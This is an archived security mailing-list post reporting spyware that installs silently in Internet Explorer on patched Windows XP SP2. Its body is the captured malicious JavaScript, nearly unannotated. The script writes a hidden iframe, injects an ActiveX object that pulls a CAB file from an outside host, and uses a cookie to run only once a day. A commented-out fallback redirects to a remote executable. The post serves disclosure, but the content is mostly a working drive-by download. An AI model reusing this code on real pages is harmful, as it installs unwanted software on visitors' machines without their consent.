lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
From: mshirley at gmail.com (Mark Shirley)
Subject: Spyware installs with no interaction in IE on fully patched XP SP2 box

var exepath='http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab';	
var retry_enabled = true;
var retry_cnt=1;

executeScript(getCookie('minpopup80wu03rd'));


function executeScript(CookieExists) {

	//Check if cookie exists, if it does we know the user has visited the
site within the last 24 hrs so don't load the script
	if (CookieExists!=null) {

		//If cookie does exists then exit
		
		return null;

		}
	else {

		//If cookie does not exist then we can assume the user has not been
to the site within the last 24 hrs
		document.write('<iframe id="downloads_manager"
style="position:absolute;visibility:hidden;"></iframe>');
		
	      document_code = '<html><head>\n';
              document_code += '<\/head><body>\n';
              document_code += '<object
onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID"
VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n';
              document_code += '<\/body><\/html>';
              downloads_manager.document.write(document_code);
              downloads_manager.document.close();

		setCookie('minpopup80wu03rd','test',1);

		}
	}



function retry()
{
	//if(retry_cnt>0) 
	//{
		//setCookie('minpopup80wu03rd','test',0);
		//alert("To install latest At-Games Games update, please click Yes"); 
		//document_code = '<html><head>\n';
                //document_code += '<\/head><body>\n';
                //document_code += '<object id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
HEIGHT=0 WIDTH=0></object>\n';
                //document_code += '<\/body><\/html>';
                //downloads_manager.document.write(document_code);
                //downloads_manager.document.close();
		//setCookie('minpopup80wu03rd','test',1);
		//retry_cnt--;
	//} else {
			//alert("This is a 1 time install, once you click Open it will
never pop up this message again");
			//window.location =
"http://www.NetpalOffers.net/NetpalOffers/DMOXe/80wu03rd.exe";
	//}
}


function getCookie(NameOfCookie) {

if (document.cookie.length > 0)  { 

	begin = document.cookie.indexOf(NameOfCookie+"="); 
	if (begin != -1) { 

	begin += NameOfCookie.length+1; 
	end = document.cookie.indexOf(";", begin);

	if (end == -1) end = document.cookie.length;
		return unescape(document.cookie.substring(begin, end)); } 
	}
	return null; 

}


function setCookie(NameOfCookie, value, expiredays) {

var ExpireDate = new Date ();
ExpireDate.setTime(ExpireDate.getTime() + (expiredays * 24 * 3600 * 1000));

document.cookie = NameOfCookie + "=" + escape(value) + 
((expiredays == null) ? "" : "; expires=" + ExpireDate.toGMTString());
}


Powered by blists - more mailing lists